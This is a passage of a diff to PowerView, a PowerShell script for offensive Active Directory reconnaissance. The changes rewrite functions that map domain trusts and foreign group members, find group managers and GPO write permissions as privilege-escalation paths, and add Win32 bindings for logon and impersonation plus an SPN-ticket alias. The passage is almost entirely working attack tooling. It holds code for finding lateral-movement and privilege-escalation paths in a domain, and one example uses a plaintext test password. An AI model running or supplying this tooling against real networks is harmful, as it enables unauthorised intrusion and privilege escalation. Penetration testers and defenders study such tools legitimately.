'Subtree', - [ValidateRange(1,10000)] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200 - ) + $ResultPageSize = 200, - function Get-ForeignGroup { - param( - [String] - $GroupName = '*', + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, - [String] - $Domain, + [Switch] + $Tombstone, - [String] - $DomainController, + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - [ValidateRange(1,10000)] - [Int] - $PageSize = 200 - ) + BEGIN { + $SearcherArguments = @{} + $SearcherArguments['LDAPFilter'] = '(member=*)' + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw } + } - if(-not $Domain) { - $Domain = (Get-NetDomain).Name + PROCESS { + # standard group names to ignore + $ExcludeGroups = @('Users', 'Domain Users', 'Guests') + + Get-DomainGroup @SearcherArguments | Where-Object { $ExcludeGroups -notcontains $_.samaccountname } | ForEach-Object { + $GroupName = $_.samAccountName + $GroupDistinguishedName = $_.distinguishedname + $GroupDomain = $GroupDistinguishedName.SubString($GroupDistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + + $_.member | ForEach-Object { + # filter for foreign SIDs in the cn field for users in another domain, + # or if the DN doesn't end with the proper DN for the queried domain + $MemberDomain = $_.SubString($_.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + if (($_ -match 'CN=S-1-5-21.*-.*') -or ($GroupDomain -ne $MemberDomain)) { + $MemberDistinguishedName = $_ + $MemberName = $_.Split(',')[0].split('=')[1] + + $ForeignGroupMember = New-Object PSObject + $ForeignGroupMember | Add-Member Noteproperty 'GroupDomain' $GroupDomain + $ForeignGroupMember | Add-Member Noteproperty 'GroupName' $GroupName + $ForeignGroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupDistinguishedName + $ForeignGroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain + $ForeignGroupMember | Add-Member Noteproperty 'MemberName' $MemberName + $ForeignGroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDistinguishedName + $ForeignGroupMember.PSObject.TypeNames.Insert(0, 'PowerView.ForeignGroupMember') + $ForeignGroupMember + } + } } + } +} - $DomainDN = "DC=$($Domain.Replace('.', ',DC='))" - Write-Verbose "DomainDN: $DomainDN" - # standard group names to ignore - $ExcludeGroups = @("Users", "Domain Users", "Guests") +function Get-DomainTrustMapping { +<# +.SYNOPSIS - # get all the groupnames for the given domain - Get-NetGroup -GroupName $GroupName -Filter '(member=*)' -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Where-Object { - # exclude common large groups - -not ($ExcludeGroups -contains $_.samaccountname) } | ForEach-Object { - - $GroupName = $_.samAccountName +This function enumerates all trusts for the current domain and then enumerates +all trusts for each domain it finds. - $_.member | ForEach-Object { - # filter for foreign SIDs in the cn field for users in another domain, - # or if the DN doesn't end with the proper DN for the queried domain - if (($_ -match 'CN=S-1-5-21.*-.*') -or ($DomainDN -ne ($_.substring($_.IndexOf("DC="))))) { +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainTrust, Get-ForestTrust - $UserDomain = $_.subString($_.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' - $UserName = $_.split(",")[0].split("=")[1] +.DESCRIPTION - $ForeignGroupUser = New-Object PSObject - $ForeignGroupUser | Add-Member Noteproperty 'GroupDomain' $Domain - $ForeignGroupUser | Add-Member Noteproperty 'GroupName' $GroupName - $ForeignGroupUser | Add-Member Noteproperty 'UserDomain' $UserDomain - $ForeignGroupUser | Add-Member Noteproperty 'UserName' $UserName - $ForeignGroupUser | Add-Member Noteproperty 'UserDN' $_ - $ForeignGroupUser - } - } - } - } +This function will enumerate domain trust relationships for the current domain using +a number of methods, and then enumerates all trusts for each found domain, recursively +mapping all reachable trust relationships. By default, and LDAP search using the filter +'(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified +LDAP is used as well. If the -NET flag is specified, the .NET method +GetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain +object. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is +used to enumerate instead. If any - if ($Recurse) { - # get all rechable domains in the trust mesh and uniquify them - if($LDAP -or $DomainController) { - $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique - } - else { - $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique - } +.PARAMETER API - ForEach($DomainTrust in $DomainTrusts) { - # get the trust groups for each domain in the trust mesh - Write-Verbose "Enumerating trust groups in domain $DomainTrust" - Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize - } - } - else { - Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize - } -} +Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the +built-in LDAP method. +.PARAMETER NET -function Find-ManagedSecurityGroups { -<# - .SYNOPSIS +Switch. Use .NET queries to enumerate trusts instead of the default LDAP method. - This function retrieves all security groups in the domain and identifies ones that - have a manager set. It also determines whether the manager has the ability to add - or remove members from the group. +.PARAMETER LDAPFilter - Author: Stuart Morgan (@ukstufus) - License: BSD 3-Clause +Specifies an LDAP query string that is used to filter Active Directory objects. - .EXAMPLE +.PARAMETER Properties - PS C:\> Find-ManagedSecurityGroups | Export-PowerViewCSV -NoTypeInformation group-managers.csv +Specifies the properties of the output object to retrieve from the server. - Store a list of all security groups with managers in group-managers.csv +.PARAMETER SearchBase - .DESCRIPTION +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. - Authority to manipulate the group membership of AD security groups and distribution groups - can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically - used to delegate management authority to distribution groups, but Windows supports security groups - being managed in the same way. +.PARAMETER Server - This function searches for AD groups which have a group manager set, and determines whether that - user can manipulate group membership. This could be a useful method of horizontal privilege - escalation, especially if the manager can manipulate the membership of a privileged group. +Specifies an Active Directory server (domain controller) to bind to. - .LINK +.PARAMETER SearchScope - https://github.com/PowerShellEmpire/Empire/pull/119 +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). -#> +.PARAMETER ResultPageSize - # Go through the list of security groups on the domain and identify those who have a manager - Get-NetGroup -FullData -Filter '(managedBy=*)' | Select-Object -Unique distinguishedName,managedBy,cn | ForEach-Object { +Specifies the PageSize to set for the LDAP searcher object. - # Retrieve the object that the managedBy DN refers to - $group_manager = Get-ADObject -ADSPath $_.managedBy | Select-Object cn,distinguishedname,name,samaccounttype,samaccountname +.PARAMETER ServerTimeLimit - # Create a results object to store our findings - $results_object = New-Object -TypeName PSObject -Property @{ - 'GroupCN' = $_.cn - 'GroupDN' = $_.distinguishedname - 'ManagerCN' = $group_manager.cn - 'ManagerDN' = $group_manager.distinguishedName - 'ManagerSAN' = $group_manager.samaccountname - 'ManagerType' = '' - 'CanManagerWrite' = $FALSE - } +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - # Determine whether the manager is a user or a group - if ($group_manager.samaccounttype -eq 0x10000000) { - $results_object.ManagerType = 'Group' - } elseif ($group_manager.samaccounttype -eq 0x30000000) { - $results_object.ManagerType = 'User' - } +.PARAMETER Tombstone - # Find the ACLs that relate to the ability to write to the group - $xacl = Get-ObjectAcl -ADSPath $_.distinguishedname -Rights WriteMembers +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - # Double-check that the manager - if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AccessControlType -eq 'Allow' -and $xacl.IdentityReference.Value.Contains($group_manager.samaccountname)) { - $results_object.CanManagerWrite = $TRUE - } - $results_object - } -} +.PARAMETER Credential +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. -function Invoke-MapDomainTrust { -<# - .SYNOPSIS +.EXAMPLE + +Get-DomainTrustMapping | Export-CSV -NoTypeInformation trusts.csv + +Map all reachable domain trusts using .NET methods and output everything to a .csv file. - This function gets all trusts for the current domain, - and tries to get all trusts for each domain it finds. +.EXAMPLE - .PARAMETER LDAP +Get-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts.csv - Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. - More likely to get around network segmentation, but not as accurate. +Map all reachable domain trusts using Win32 API calls and output everything to a .csv file. - .PARAMETER DomainController +.EXAMPLE - Domain controller to reflect LDAP queries through. +Get-DomainTrustMapping -NET | Export-CSV -NoTypeInformation trusts.csv - .PARAMETER PageSize +Map all reachable domain trusts using .NET methods and output everything to a .csv file. - The PageSize to set for the LDAP searcher object. +.EXAMPLE - .PARAMETER Credential +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainTrustMapping -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +Map all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries +using the specified alternate credentials, and output everything to a .csv file. - .EXAMPLE +.OUTPUTS - PS C:\> Invoke-MapDomainTrust | Export-CSV -NoTypeInformation trusts.csv - - Map all reachable domain trusts and output everything to a .csv file. +PowerView.DomainTrust.LDAP - .LINK +Custom PSObject with translated domain LDAP trust result fields (default). - http://blog.harmj0y.net/ +PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods. + +PowerView.DomainTrust.API + +Custom PSObject with translated domain API trust result fields. #> - [CmdletBinding()] - param( + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DomainTrust.NET')] + [OutputType('PowerView.DomainTrust.LDAP')] + [OutputType('PowerView.DomainTrust.API')] + [CmdletBinding(DefaultParameterSetName = 'LDAP')] + Param( + [Parameter(ParameterSetName = 'API')] [Switch] - $LDAP, + $API, + + [Parameter(ParameterSetName = 'NET')] + [Switch] + $NET, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $DomainController, + $SearchBase, - [ValidateRange(1,10000)] + [Parameter(ParameterSetName = 'LDAP')] + [Parameter(ParameterSetName = 'API')] + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200, + $ServerTimeLimit, + [Parameter(ParameterSetName = 'LDAP')] + [Switch] + $Tombstone, + + [Parameter(ParameterSetName = 'LDAP')] [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) # keep track of domains seen so we don't hit infinite recursion @@ -13198,109 +20487,213 @@ function Invoke-MapDomainTrust { # our domain status tracker $Domains = New-Object System.Collections.Stack + $DomainTrustArguments = @{} + if ($PSBoundParameters['API']) { $DomainTrustArguments['API'] = $API } + if ($PSBoundParameters['NET']) { $DomainTrustArguments['NET'] = $NET } + if ($PSBoundParameters['LDAPFilter']) { $DomainTrustArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['Properties']) { $DomainTrustArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $DomainTrustArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $DomainTrustArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $DomainTrustArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $DomainTrustArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $DomainTrustArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $DomainTrustArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $DomainTrustArguments['Credential'] = $Credential } + # get the current domain and push it onto the stack - $CurrentDomain = (Get-NetDomain -Credential $Credential).Name - $Domains.push($CurrentDomain) + if ($PSBoundParameters['Credential']) { + $CurrentDomain = (Get-Domain -Credential $Credential).Name + } + else { + $CurrentDomain = (Get-Domain).Name + } + $Domains.Push($CurrentDomain) while($Domains.Count -ne 0) { $Domain = $Domains.Pop() # if we haven't seen this domain before - if ($Domain -and ($Domain.Trim() -ne "") -and (-not $SeenDomains.ContainsKey($Domain))) { - - Write-Verbose "Enumerating trusts for domain '$Domain'" + if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) { + + Write-Verbose "[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'" # mark it as seen in our list - $Null = $SeenDomains.add($Domain, "") + $Null = $SeenDomains.Add($Domain, '') try { # get all the trusts for this domain - if($LDAP -or $DomainController) { - $Trusts = Get-NetDomainTrust -Domain $Domain -LDAP -DomainController $DomainController -PageSize $PageSize -Credential $Credential - } - else { - $Trusts = Get-NetDomainTrust -Domain $Domain -PageSize $PageSize -Credential $Credential - } + $DomainTrustArguments['Domain'] = $Domain + $Trusts = Get-DomainTrust @DomainTrustArguments - if($Trusts -isnot [System.Array]) { + if ($Trusts -isnot [System.Array]) { $Trusts = @($Trusts) } # get any forest trusts, if they exist - if(-not ($LDAP -or $DomainController) ) { - $Trusts += Get-NetForestTrust -Forest $Domain -Credential $Credential + if ($PsCmdlet.ParameterSetName -eq 'NET') { + $ForestTrustArguments = @{} + if ($PSBoundParameters['Forest']) { $ForestTrustArguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $ForestTrustArguments['Credential'] = $Credential } + $Trusts += Get-ForestTrust @ForestTrustArguments } if ($Trusts) { - if($Trusts -isnot [System.Array]) { + if ($Trusts -isnot [System.Array]) { $Trusts = @($Trusts) } # enumerate each trust found ForEach ($Trust in $Trusts) { - if($Trust.SourceName -and $Trust.TargetName) { - $SourceDomain = $Trust.SourceName - $TargetDomain = $Trust.TargetName - $TrustType = $Trust.TrustType - $TrustDirection = $Trust.TrustDirection - $ObjectType = $Trust.PSObject.TypeNames | Where-Object {$_ -match 'PowerView'} | Select-Object -First 1 - + if ($Trust.SourceName -and $Trust.TargetName) { # make sure we process the target - $Null = $Domains.Push($TargetDomain) - - # build the nicely-parsable custom output object - $DomainTrust = New-Object PSObject - $DomainTrust | Add-Member Noteproperty 'SourceDomain' "$SourceDomain" - $DomainTrust | Add-Member Noteproperty 'SourceSID' $Trust.SourceSID - $DomainTrust | Add-Member Noteproperty 'TargetDomain' "$TargetDomain" - $DomainTrust | Add-Member Noteproperty 'TargetSID' $Trust.TargetSID - $DomainTrust | Add-Member Noteproperty 'TrustType' "$TrustType" - $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$TrustDirection" - $DomainTrust.PSObject.TypeNames.Add($ObjectType) - $DomainTrust + $Null = $Domains.Push($Trust.TargetName) + $Trust } } } } catch { - Write-Verbose "[!] Error: $_" + Write-Verbose "[Get-DomainTrustMapping] Error: $_" } } } } +function Get-GPODelegation { +<# +.SYNOPSIS + +Finds users with write permissions on GPO objects which may allow privilege escalation within the domain. + +Author: Itamar Mizrahi (@MrAnde7son) +License: BSD 3-Clause +Required Dependencies: None + +.PARAMETER GPOName + +The GPO display name to query for, wildcards accepted. + +.PARAMETER PageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.EXAMPLE + +Get-GPODelegation + +Returns all GPO delegations in current forest. + +.EXAMPLE + +Get-GPODelegation -GPOName + +Returns all GPO delegations on a given GPO. +#> + + [CmdletBinding()] + Param ( + [String] + $GPOName = '*', + + [ValidateRange(1,10000)] + [Int] + $PageSize = 200 + ) + + $Exclusions = @('SYSTEM','Domain Admins','Enterprise Admins') + + $Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() + $DomainList = @($Forest.Domains) + $Domains = $DomainList | foreach { $_.GetDirectoryEntry() } + foreach ($Domain in $Domains) { + $Filter = "(&(objectCategory=groupPolicyContainer)(displayname=$GPOName))" + $Searcher = New-Object System.DirectoryServices.DirectorySearcher + $Searcher.SearchRoot = $Domain + $Searcher.Filter = $Filter + $Searcher.PageSize = $PageSize + $Searcher.SearchScope = "Subtree" + $listGPO = $Searcher.FindAll() + foreach ($gpo in $listGPO){ + $ACL = ([ADSI]$gpo.path).ObjectSecurity.Access | ? {$_.ActiveDirectoryRights -match "Write" -and $_.AccessControlType -eq "Allow" -and $Exclusions -notcontains $_.IdentityReference.toString().split("\")[1] -and $_.IdentityReference -ne "CREATOR OWNER"} + if ($ACL -ne $null){ + $GpoACL = New-Object psobject + $GpoACL | Add-Member Noteproperty 'ADSPath' $gpo.Properties.adspath + $GpoACL | Add-Member Noteproperty 'GPODisplayName' $gpo.Properties.displayname + $GpoACL | Add-Member Noteproperty 'IdentityReference' $ACL.IdentityReference + $GpoACL | Add-Member Noteproperty 'ActiveDirectoryRights' $ACL.ActiveDirectoryRights + $GpoACL + } + } + } +} + + ######################################################## # # Expose the Win32API functions and datastructures below -# using PSReflect. -# Warning: Once these are executed, they are baked in +# using PSReflect. +# Warning: Once these are executed, they are baked in # and can't be changed while the script is running! # ######################################################## $Mod = New-InMemoryModule -ModuleName Win32 -# all of the Win32 API functions we need -$FunctionDefinitions = @( - (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), - (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), - (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), - (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), - (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())), - (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())), - (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])), - (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError), - (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError), - (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])), - (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])), - (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), - (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), - (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])), - (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])), - (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])) -) +# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', Scope='Function', Target='psenum')] + +# used to parse the 'samAccountType' property for users/computers/groups +$SamAccountTypeEnum = psenum $Mod PowerView.SamAccountTypeEnum UInt32 @{ + DOMAIN_OBJECT = '0x00000000' + GROUP_OBJECT = '0x10000000' + NON_SECURITY_GROUP_OBJECT = '0x10000001' + ALIAS_OBJECT = '0x20000000' + NON_SECURITY_ALIAS_OBJECT = '0x20000001' + USER_OBJECT = '0x30000000' + MACHINE_ACCOUNT = '0x30000001' + TRUST_ACCOUNT = '0x30000002' + APP_BASIC_GROUP = '0x40000000' + APP_QUERY_GROUP = '0x40000001' + ACCOUNT_TYPE_MAX = '0x7fffffff' +} + +# used to parse the 'grouptype' property for groups +$GroupTypeEnum = psenum $Mod PowerView.GroupTypeEnum UInt32 @{ + CREATED_BY_SYSTEM = '0x00000001' + GLOBAL_SCOPE = '0x00000002' + DOMAIN_LOCAL_SCOPE = '0x00000004' + UNIVERSAL_SCOPE = '0x00000008' + APP_BASIC = '0x00000010' + APP_QUERY = '0x00000020' + SECURITY = '0x80000000' +} -Bitfield + +# used to parse the 'userAccountControl' property for users/groups +$UACEnum = psenum $Mod PowerView.UACEnum UInt32 @{ + SCRIPT = 1 + ACCOUNTDISABLE = 2 + HOMEDIR_REQUIRED = 8 + LOCKOUT = 16 + PASSWD_NOTREQD = 32 + PASSWD_CANT_CHANGE = 64 + ENCRYPTED_TEXT_PWD_ALLOWED = 128 + TEMP_DUPLICATE_ACCOUNT = 256 + NORMAL_ACCOUNT = 512 + INTERDOMAIN_TRUST_ACCOUNT = 2048 + WORKSTATION_TRUST_ACCOUNT = 4096 + SERVER_TRUST_ACCOUNT = 8192 + DONT_EXPIRE_PASSWORD = 65536 + MNS_LOGON_ACCOUNT = 131072 + SMARTCARD_REQUIRED = 262144 + TRUSTED_FOR_DELEGATION = 524288 + NOT_DELEGATED = 1048576 + USE_DES_KEY_ONLY = 2097152 + DONT_REQ_PREAUTH = 4194304 + PASSWORD_EXPIRED = 8388608 + TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216 + PARTIAL_SECRETS_ACCOUNT = 67108864 +} -Bitfield # enum used by $WTS_SESSION_INFO_1 below $WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{ @@ -13317,7 +20710,7 @@ $WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{ } # the WTSEnumerateSessionsEx result structure -$WTS_SESSION_INFO_1 = struct $Mod WTS_SESSION_INFO_1 @{ +$WTS_SESSION_INFO_1 = struct $Mod PowerView.RDPSessionInfo @{ ExecEnvId = field 0 UInt32 State = field 1 $WTSConnectState SessionId = field 2 UInt32 @@ -13335,26 +20728,26 @@ $WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{ } # the NetShareEnum result structure -$SHARE_INFO_1 = struct $Mod SHARE_INFO_1 @{ - shi1_netname = field 0 String -MarshalAs @('LPWStr') - shi1_type = field 1 UInt32 - shi1_remark = field 2 String -MarshalAs @('LPWStr') +$SHARE_INFO_1 = struct $Mod PowerView.ShareInfo @{ + Name = field 0 String -MarshalAs @('LPWStr') + Type = field 1 UInt32 + Remark = field 2 String -MarshalAs @('LPWStr') } # the NetWkstaUserEnum result structure -$WKSTA_USER_INFO_1 = struct $Mod WKSTA_USER_INFO_1 @{ - wkui1_username = field 0 String -MarshalAs @('LPWStr') - wkui1_logon_domain = field 1 String -MarshalAs @('LPWStr') - wkui1_oth_domains = field 2 String -MarshalAs @('LPWStr') - wkui1_logon_server = field 3 String -MarshalAs @('LPWStr') +$WKSTA_USER_INFO_1 = struct $Mod PowerView.LoggedOnUserInfo @{ + UserName = field 0 String -MarshalAs @('LPWStr') + LogonDomain = field 1 String -MarshalAs @('LPWStr') + AuthDomains = field 2 String -MarshalAs @('LPWStr') + LogonServer = field 3 String -MarshalAs @('LPWStr') } # the NetSessionEnum result structure -$SESSION_INFO_10 = struct $Mod SESSION_INFO_10 @{ - sesi10_cname = field 0 String -MarshalAs @('LPWStr') - sesi10_username = field 1 String -MarshalAs @('LPWStr') - sesi10_time = field 2 UInt32 - sesi10_idle_time = field 3 UInt32 +$SESSION_INFO_10 = struct $Mod PowerView.SessionInfo @{ + CName = field 0 String -MarshalAs @('LPWStr') + UserName = field 1 String -MarshalAs @('LPWStr') + Time = field 2 UInt32 + IdleTime = field 3 UInt32 } # enum used by $LOCALGROUP_MEMBERS_INFO_2 below @@ -13370,6 +20763,12 @@ $SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{ SidTypeComputer = 9 } +# the NetLocalGroupEnum result structure +$LOCALGROUP_INFO_1 = struct $Mod LOCALGROUP_INFO_1 @{ + lgrpi1_name = field 0 String -MarshalAs @('LPWStr') + lgrpi1_comment = field 1 String -MarshalAs @('LPWStr') +} + # the NetLocalGroupGetMembers result structure $LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{ lgrmi2_sid = field 0 IntPtr @@ -13414,7 +20813,102 @@ $DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{ DomainGuid = field 7 Guid } +# used by WNetAddConnection2W +$NETRESOURCEW = struct $Mod NETRESOURCEW @{ + dwScope = field 0 UInt32 + dwType = field 1 UInt32 + dwDisplayType = field 2 UInt32 + dwUsage = field 3 UInt32 + lpLocalName = field 4 String -MarshalAs @('LPWStr') + lpRemoteName = field 5 String -MarshalAs @('LPWStr') + lpComment = field 6 String -MarshalAs @('LPWStr') + lpProvider = field 7 String -MarshalAs @('LPWStr') +} + +# all of the Win32 API functions we need +$FunctionDefinitions = @( + (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetLocalGroupEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())), + (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())), + (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])), + (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError), + (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError), + (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])), + (func advapi32 LogonUser ([Bool]) @([String], [String], [String], [UInt32], [UInt32], [IntPtr].MakeByRefType()) -SetLastError), + (func advapi32 ImpersonateLoggedOnUser ([Bool]) @([IntPtr]) -SetLastError), + (func advapi32 RevertToSelf ([Bool]) @() -SetLastError), + (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])), + (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), + (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), + (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])), + (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])), + (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])), + (func Mpr WNetAddConnection2W ([Int]) @($NETRESOURCEW, [String], [String], [UInt32])), + (func Mpr WNetCancelConnection2 ([Int]) @([String], [Int], [Bool])), + (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError) +) + $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' $Netapi32 = $Types['netapi32'] $Advapi32 = $Types['advapi32'] $Wtsapi32 = $Types['wtsapi32'] +$Mpr = $Types['Mpr'] +$Kernel32 = $Types['kernel32'] + +Set-Alias Get-IPAddress Resolve-IPAddress +Set-Alias Convert-NameToSid ConvertTo-SID +Set-Alias Convert-SidToName ConvertFrom-SID +Set-Alias Request-SPNTicket Get-DomainSPNTicket +Set-Alias Get-DNSZone Get-DomainDNSZone 